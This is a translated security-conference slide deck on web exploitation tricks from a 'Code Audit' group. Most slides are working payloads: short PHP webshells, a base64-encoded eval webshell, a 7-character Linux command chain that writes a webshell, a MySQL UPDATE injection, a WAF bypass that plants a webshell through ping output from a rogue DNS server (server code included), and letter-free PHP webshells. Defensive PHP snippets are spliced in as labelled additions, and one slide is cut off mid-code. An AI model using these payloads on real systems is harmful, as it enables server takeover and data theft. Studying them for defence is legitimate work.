Slide 1

Some Tricks From My Secret Group

Slide 2

About PHITHON
The people Chairman Xi cares about most:
▪ The needy masses
▪ Security researcher
▪ Programmer
▪ Cat slave
▪ From @chaitin
Blog: https://www.leavesongs.com
Weibo: @phithon_xg
GitHub: @phith0n

Slide 3

Those Tricks From My Secret Group
The "Code Audit" (代码审计) secret group: a small circle for sharing and discussing sneaky web security tricks.

Timeline
❖ 2016.11.14 Group created
❖ 2016.11.15 Over 100 members
❖ 2016.12.01 More security-related groups formed
❖ 2017.01.09 WeChat mini-programs launched; the secret group tried them early
❖ 2017.02.10 Over 400 members
❖ 2017.02.16 146 topics posted
❖ 2017.02.18 This talk, "Those Tricks From My Secret Group"

Less noise / no prejudice / purely technical exchange / sharing ideas / facing vulnerabilities rationally / earning a little money

Slide 4

1 EVAL Length Restriction Bypass Trick

Slide 5

How to Execute a PHP Webshell Within 16 Characters

Slide 6

EVAL Length Restriction Bypass Trick

Slide 7

`$_GET[1]`
➔ Length: 10
➔ Difficulty: Easy
➔ Exploit Requirement: High
➔ Score: 0
Another answer: exec($_GET[1]);

Slide 8

`include$_GET[1];`
➔ Length: 16
➔ Difficulty: Hard
➔ Exploit Requirement: Low
➔ Score: 40
phpinfo(); ⇒ $_FILES[file][tmp_name] ⇒ include
Reference: https://goo.gl/Djgzvg

Slide 9

Not Beautiful?
score < 50 === poor exploit

Slide 10

foo.php?1=file_put_contents&param=$_GET[1](N,P,8);
foo.php?1=file_put_contents&param=$_GET[1](N,D,8);
...
foo.php?1=file_put_contents&param=$_GET[1](N,w,8);
/* put 'PD9waHAgZXZhbCgkX1BPU1RbOV0pOw' into file 'N' */
foo.php?param=include$_GET[1];&1=php://filter/read=convert.base64-decode/resource=N
➔ Length: 16
➔ Difficulty: Moderate
➔ Exploit Requirement: Low
➔ Score: 80

Slide 11

`usort(...$_GET);`
foo.php?1[]=test&1[]=phpinfo();&2=assert
➔ Length: 16
➔ Difficulty: Easy
➔ Exploit Requirement: High
➔ Score: 100
PHP 5.6 variable-length argument lists ⇒ usort callback backdoor ⇒ arbitrary code execution

Slide 12

"such a beautiful exploit, it's almost like art"

Slide 13

2 Linux Command Length Restriction Bypass Trick

Slide 14

How to Execute an Arbitrary Command Within 7 Characters

Slide 15

Linux Command Length Restriction Bypass Trick
The question comes from exploiting a binary vulnerability. In that vulnerability we control an 8-byte string, but it must end with "\0", so only 7 characters are usable. I wrote a simple example in PHP.

Slide 16

How To Put An Elephant Into A Refrigerator
1. Open the Door
2. Put the Elephant in
3. Close the Door

Slide 17

How To Bypass The Linux Command Length Restriction?
`sh 0` ⇒ Length: 4 ⇒ Get Shell
`.. > 0` ⇒ Length?

Slide 18

How To Bypass The Linux Command Length Restriction?
`sh 0` ⇒ Length: 4 ⇒ Get Shell
`.. > 0` ⇒ Length? Difficulty

Slide 19

Linux Command Length Restriction Bypass Trick
An awesome trick from @超威蓝猫.
www:~$ w>hp
www:~$ w>c.p\\
www:~$ w>d\>\\
www:~$ w>\ -\\
www:~$ w>e64\\
www:~$ w>bas\\
www:~$ w>7\|\\
www:~$ w>XSk\\
...
www:~$ w>PD9\\
www:~$ w>o\ \\
www:~$ w>ech\\
www:~$ ls -t>0
www:~$ sh 0

Slide 20

Linux Command Length Restriction Bypass Trick
www:~$ ls -t
ech\
o \
PD9\
waH\
AgZ\
XZh\
bCg\
kX0\
dFV\
Fsx\
XSk\
7|\
bas\
e64\
-\
d>\
c.p\
hp
www:~$ echo PD9waHAgZXZhbCgkX0dFVFsxXSk7| base64 -d> c.php
▪ w: the shortest command in Linux
▪ ls -t: list the directory sorted by modification time
▪ A [\n] between every two filenames
▪ [\] quotes the [\n] that follows the filename
▪ So the [\n] does not influence command execution
▪ Arbitrary command execution vulnerability

Slide 21

➔ Length: 7
➔ Difficulty: Easy
➔ Exploit Requirement: Low
➔ Score: 100

Slide 22

Other Solution? Keyword: `. /*/*R`

Slide 23

3 MySQL SQLi Without Comments Trick

Slide 24

How To Exploit SQL Injection After "UPDATE `table`" In A Multi-Line Environment?

Slide 25

MySQL SQLi Without Comments
The SQL injection occurs at the position of `$table`, but we cannot comment out the rest of the SQL statement (because of the line feed).

Slide 26

Review the Basics
"If the foundation is not solid, the earth shakes and the mountains sway." (基础不牢,地动山摇)

Slide 27

MySQL "Comment" Syntax
▪ [#] Single-line comment
▪ [-- ] Single-line comment: double dash followed by a whitespace
▪ [/*...*/] Multi-line comment
▪ [`] Under some conditions, a backtick behaves like a comment
  ▫ MySQL @@version <= 5.5
  ▫ Reference: https://goo.gl/633Ej7
▪ [;] When multiple-statement execution is supported
  ▫ PDO ✔
  ▫ Mysql ✘
  ▫ Mysqli ✘

Slide 28

MySQL UPDATE Syntax
Update syntax: https://goo.gl/LkSDVa
UPDATE [LOW_PRIORITY] [IGNORE] table_reference
    SET col_name1={expr1|DEFAULT} [, col_name2={expr2|DEFAULT}] ...
    [WHERE where_condition]
    [ORDER BY ...]
    [LIMIT row_count]
Which statements can be put in the "table_reference" position?

Slide 29

MySQL UPDATE Syntax
table_reference: a static table name, or a dynamic table name produced by a JOIN statement
Join syntax: https://goo.gl/lvIf7E
...
table_reference [INNER | CROSS] JOIN table_factor [join_condition]
| table_reference STRAIGHT_JOIN table_factor
| table_reference STRAIGHT_JOIN table_factor ON conditional_expr
| table_reference {LEFT|RIGHT} [OUTER] JOIN table_reference join_condition
| table_reference NATURAL [{LEFT|RIGHT} [OUTER]] JOIN table_factor

Slide 30

UPDATE `user` JOIN (SELECT updatexml(0,concat(0xa,version()),0) )a#`
SET username='admin' WHERE id=1;
➔ Difficulty: Easy
➔ Exploit Requirement: Low
➔ Score: 70
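The defensive counterpart of the UPDATE-position injection above, as an added example that is not code from the slides: a table name is an identifier, so it cannot be bound as a prepared-statement parameter and must be allowlisted and backtick-quoted instead. The function names and the $allowed list are my own assumptions.

```php
<?php
// Added example: allowlist + identifier quoting for a table name that lands in
// the table_reference position of an UPDATE. Names here are assumptions.

function quote_identifier(string $name): string
{
    // MySQL identifier quoting: wrap in backticks and double any embedded one,
    // so a closing backtick followed by JOIN (...) can never leave the name.
    return '`' . str_replace('`', '``', $name) . '`';
}

function build_update(string $table, array $allowed): string
{
    // Strict comparison: the identifier must literally be one of the known tables.
    if (!in_array($table, $allowed, true)) {
        throw new InvalidArgumentException('table not in allowlist: ' . $table);
    }
    // Column values still go through placeholders; only the identifier is inlined.
    return 'UPDATE ' . quote_identifier($table) . ' SET username = ? WHERE id = ?';
}

$allowed = ['user', 'post'];   // assumed application setting
echo build_update('user', $allowed), "\n";

// The slide's payload fails the allowlist before any SQL is built. Even with
// quoting alone, its backtick would be doubled and stay inside the identifier.
$payload = "user` JOIN (SELECT updatexml(0,concat(0xa,version()),0) )a#";
echo quote_identifier($payload), "\n";
try {
    build_update($payload, $allowed);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```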

Slide 31

The Importance of Documentation

Slide 32

4 Command Execution WAF Bypass Trick

Slide 33

How To Write A Webshell Via The Ping Command?

Slide 34

Command Execution WAF Bypass Trick
', '>', $ip);
echo shell_exec('ping -c1 ' . $ip);

Slide 35

Three Difficulty Steps
▪ Control Ping's Result
▪ The Influence Of Local DNS
▪ stripos($ip, '.php')

Slide 36

Bash && escapeshellcmd Characters
www:~$ una""me -a
Linux vultr.guest 4.9.6-040906-generic #201701260330 SMP Thu Jan 26 08:32:10 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
▪ escapeshellcmd (https://goo.gl/Ln0mXi)
  ▫ Escapes &#;`|*?~<>^()[]{}$\x5C\x0A\xFF
  ▫ Does not escape " and ' if they are paired
▪ In bash, "" is the empty string
  ▫ .p""hp ⇒ .php ⇒ WAF bypass!

Slide 37

Three Difficulty Steps
▪ Control Ping's Result
▪ The Influence Of Local DNS
▪ stripos($ip, '.php')

Slide 38

Ping Research
www:~$ ping -c1 www.leavesongs.com
PING leavesongs.com (107.191.60.143) 56(84) bytes of data.
64 bytes from 107.191.60.143.vultr.com (107.191.60.143): icmp_seq=1 ttl=64 time=0.033 ms

--- leavesongs.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.033/0.033/0.033/0.000 ms
▪ We can control ping's output via a CNAME record!
▪ Idea: set the CNAME record of my domain name to a webshell

Slide 39

Deploy An Evil DNS Server
Goal: deploy my own DNS server && return the webshell
Reason: DNSPod (and others) don't allow special characters in records
Tool: dnslib.py

    from dnslib import DNSRecord, DNSHeader, RR, CNAME, A

    # data: the raw UDP packet received from the resolver
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    if str(qname).startswith('aaa.dddns.leavesongs.com'):
        # rtype=5: CNAME record
        rdata = CNAME('.dddns.leavesongs.com')
        reply.add_answer(RR(rname=qname, rtype=5, rclass=1, ttl=300, rdata=rdata))
    else:
        # rtype=1: A record
        rdata = A('107.191.60.143')
        reply.add_answer(RR(rname=qname, rtype=1, rclass=1, ttl=300, rdata=rdata))

Slide 40

Ping Research
www:~$ ping -c1 aaa.dddns.leavesongs.com
PING .dddns.leavesongs.com (107.191.60.143): 56 data bytes
64 bytes from 107.191.60.143: icmp_seq=0 ttl=50 time=101.293 ms

--- .dddns.leavesongs.com ping statistics ---
1 packets transmitted, 1 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 101.293/101.293/101.293/0.000 ms
dddns.leavesongs.com ⇒ NS record ⇒ my DNS server
aaa.dddns.leavesongs.com ⇒ .dddns.leavesongs.com ⇒ 107.191.60.143

Slide 41

Three Difficulty Steps
▪ Control Ping's Result
▪ The Influence Of Local DNS
▪ stripos($ip, '.php')

Slide 42

Ping Research
www:~$ nslookup aaa.dddns.leavesongs.com
Server:         8.8.8.8
Address:        8.8.8.8#53

Non-authoritative answer:
aaa.dddns.leavesongs.com        canonical name = .dddns.leavesongs.com.
Name:   .dddns.leavesongs.com
Address: 107.191.60.143

www:~$ ping -c1 aaa.dddns.leavesongs.com
ping: unknown host aaa.dddns.leavesongs.com
WHAT THE F**K ?

Slide 43

The Influence Of Local DNS
Resolver        NSLOOKUP  DIG  PING
8.8.8.8         ✔         ✔    ✘
119.29.29.29    ✔         ✔    ✔
223.5.5.5       ✘         ✘    ✘

Slide 44

Breaking Through The Difficulties
▪ Control Ping's Result
▪ The Influence Of Local DNS
▪ stripos($ip, '.php')

Slide 45

`ping yourdomain.com > 1.ph""p`
➔ Difficulty: Hard
➔ Exploit Requirement: High
➔ Score: 90
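Why the `.php` keyword check plus escapeshellcmd() (Slide 36) fails, and a hardened handler for the same ping feature that also closes the CNAME path (Slides 38 to 45), as an added example that is not the slide's code; the function names are my own, and the filter mirrors the slide's stripos($ip, '.php').

```php
<?php
// Added example: the keyword filter from the slides beside a hardened version.
// keyword_filter_passes/shell_sees/hardened_ping_command are assumed names.

function keyword_filter_passes(string $arg): bool
{
    // The slide's filter: block any argument that contains ".php".
    return stripos($arg, '.php') === false;
}

function shell_sees(string $arg): string
{
    // Bash joins adjacent words and treats "" as the empty string, so a pair of
    // double quotes simply disappears. Assumption: only paired "" occur in $arg.
    return str_replace('""', '', $arg);
}

function hardened_ping_command(string $host): ?string
{
    // Accept a literal IP address only. Hostnames are refused, so DNS data such
    // as a CNAME record cannot reach ping's output at all.
    if (filter_var($host, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    // escapeshellarg() single-quotes the whole value; unlike escapeshellcmd() it
    // cannot leave a redirection, a second command or a quote pair intact.
    return 'ping -c1 ' . escapeshellarg($host);
}

$arg = '1.ph""p';
// The filter looks for ".php" but the bytes are ph""p, so it lets the value
// through; escapeshellcmd() leaves the paired quotes as they are, and bash then
// sees 1.php. The hardened function rejects it because it is not an IP address.
printf("keyword filter passes:   %s\n", var_export(keyword_filter_passes($arg), true));
printf("unchanged by escapeshellcmd: %s\n", var_export(escapeshellcmd($arg) === $arg, true));
printf("what bash runs:          %s\n", shell_sees($arg));
printf("hardened (payload):      %s\n", var_export(hardened_ping_command($arg), true));
printf("hardened (real address): %s\n", hardened_ping_command('107.191.60.143'));
```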

Slide 46

5 PHP Webshell Without Letters And Numbers Trick

Slide 47

How To Create A PHP Webshell Without Letters And Numbers?

Slide 48

PHP Webshell Without Letters And Numbers Trick
The question came from an idle daydream one day.

Slide 49

PHP Webshell Without Letters And Numbers Trick
Three steps
▪ Get numbers
▪ Get letters (important)
▪ Execute code

Slide 50

PHP Webshell Without Letters And Numbers Trick
Get numbers
▪ PHP type juggling
  ⇔ TRUE == 1
  ⇔ FALSE == 0
  ⇔ TRUE + TRUE == 2
Get letters
▪ XOR: '!'^'`' == 'A'
▪ NOT: ~('和'{2}) == 's'
▪ Others?
Execute code
▪ PHP code execution
  ⇔ $f='assert'; $f(...);
  ⇔ Restricted in PHP 7

Slide 51

'!'^'`' == 'A'
Using XOR to get a letter
➔ Complexity: Low
➔ Difficulty: Easy
➔ Exploit Requirement: Low
➔ Score: 40

Slide 52

~('和'{2}) == 's'
Using NOT to get a letter
➔ Complexity: High
➔ Difficulty: Easy
➔ Exploit Requirement: Low
➔ Score: 50

Slide 53

Not beautiful? How to solve the question without bit operations?

Slide 54

PHP Increment Operation
▪ $i++
▪ PHP's increment operation on strings == C + Perl
  ▫ 'a'++ ⇒ 'b'; 'b'++ ⇒ 'c'; 'c'++ ⇒ 'd'; ...
  ▫ Only alphanumeric characters ([a-zA-Z0-9]) are supported
  ▫ 'z'++ ⇒ 'aa';
▪ Think about it: could the increment operation help solve the problem?

Slide 55

PHP Webshell Without Letters And Numbers Trick
▪ Could the increment operation help solve the problem?
  ▫ Got 'A' ⇒ Got 'B' ⇒ ... ⇒ Got 'Z'
▪ How to get 'A'?
  ▫ PHP 5.3 and earlier: Array() ⇔ after PHP 5.3: []
  ▫ ''.[] == 'Array'
  ▫ 'Array'{0} === 'A'
  ▫ 'Array'{3} === 'a'
  ▫ '' == 0
  ▫ $_=''.[]; $_{''}==='A';

Slide 56

$_=''.[]; $_{''}==='A';
Using Array + increment to get letters
➔ Complexity: Medium
➔ Difficulty: Moderate
➔ Exploit Requirement: Low
➔ Score: 80
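From the defender's side, the three letter-recovery techniques of Slides 50 to 56 (XOR and NOT on single characters, ''.[] giving 'Array', and ++ on a string) are exactly the markers a file scanner can key on; the heuristic below is an added example, not code from the slides, with my own thresholds and a constructed sample built only from the fragments shown above.

```php
<?php
// Added example: heuristic scanner for PHP source written almost entirely in
// punctuation. Thresholds, function names and the sample are my own assumptions.

function letter_digit_ratio(string $src): float
{
    // Strip open/close tags and whitespace, then measure how much is [A-Za-z0-9].
    $code = preg_replace('/<\?php|<\?|\?>|\s+/', '', $src);
    if ($code === '') {
        return 1.0;   // nothing to judge: treat as ordinary
    }
    return preg_match_all('/[A-Za-z0-9]/', $code) / strlen($code);
}

function obfuscation_markers(string $src): array
{
    $patterns = [
        'increment of underscore-only variable' => '/\$_+\s*\+\+/',
        'xor of two single characters'          => '/(\'.\'|".")\s*\^\s*(\'.\'|".")/su',
        'bitwise not on an expression'          => '/~\s*\(/',
        'Array-to-string trick'                 => '/\.\s*\[\s*\]/',
        'variable function call'                => '/\$\w*\s*\(/',
    ];
    $hits = [];
    foreach ($patterns as $name => $re) {
        if (preg_match($re, $src)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

function is_nonalnum_webshell(string $src): bool
{
    // Normal PHP is mostly identifiers; this style is nearly all symbols, and
    // a single marker alone (e.g. $i++) is far too common to act on.
    return letter_digit_ratio($src) < 0.15 && count(obfuscation_markers($src)) >= 2;
}

// Constructed sample assembled from the slide fragments; it recovers letters
// but executes nothing. Note the $str{0} offset syntax was deprecated in PHP 7.4
// and removed in PHP 8.0, yet scanners still meet it in older files.
$sample = "<?php \$_=''.[]; \$_=\$_{''}; \$_++; \$__='!'^'`';";
printf("ratio %.2f, markers: %s, flagged: %s\n",
    letter_digit_ratio($sample),
    implode(', ', obfuscation_markers($sample)),
    is_nonalnum_webshell($sample) ? 'yes' : 'no');
```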

Slide 57

A PHP Type Juggling Game

Slide 58

Tricks: Structure / Brainstorm / Experience / Fuzz

Slide 59

CREDITS
The inspiration above came from the friends who have kept supporting the "Code Audit" secret group
▪ @超威蓝猫
▪ @AAA
▪ @Tomato
▪ @雨了个雨
▪ @他,是鹿
▪ @wd0g
▪ @L3m0n
▪ @栋栋的栋
▪ @roker
▪ @xfkxfk
▪ @乐清小俊杰
▪ @Joseph
▪ @Melody
▪ @聂心明
▪ @索马里的海贼
▪ @mLT
▪ @HackBraid
▪ @mm519
▪ @fyth
▪ and everyone else in the group

Slide 60

Thanks! ANY QUESTIONS?
You can find me at:
Twitter: @phithon_xg
https://www.leavesongs.com